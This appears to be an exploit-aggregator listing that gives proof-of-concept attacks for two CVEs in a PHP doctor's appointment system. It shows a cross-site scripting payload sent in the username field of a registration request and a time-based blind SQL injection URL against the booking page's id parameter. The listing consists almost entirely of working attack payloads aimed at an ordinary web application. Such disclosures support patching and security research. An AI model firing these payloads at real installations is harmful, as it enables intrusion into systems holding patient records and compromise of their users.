Exploit for Doctors Appointment System 1.0 Cross Site Scripting / SQL Injection Vulnerabilities CVE-2022-36201 CVE-2022-36203

Name: Exploit for Doctors Appointment System 1.0 Cross Site Scripting / SQL Injection Vulnerabilities CVE-2022-36201 CVE-2022-36203
Rating: 5 (237 reviews)

2022-09-02 | CVSS 7.5

## https://sploitus.com/exploit?id=1337DAY-ID-37929
# Exploit Title: Doctor's Appointment System v1.0 - Cross-Site Scripting (XSS)
# Google Dork: N/A
# Exploit Author: Abdullah Zaid - @_aznull
# Vendor Homepage:
https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip
# Version: 1.0
# Tested on: Linux
# CVE : CVE-2022-36203

POC:

POST /register.php HTTP/1.1
Host: localhost

username=a"><script>alert(1337)</script>&password=123

---------------------------

# Exploit Title: SQLi - Doctor's Appointment System v1.0

# CVE : CVE-2022-36201


POC:

http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)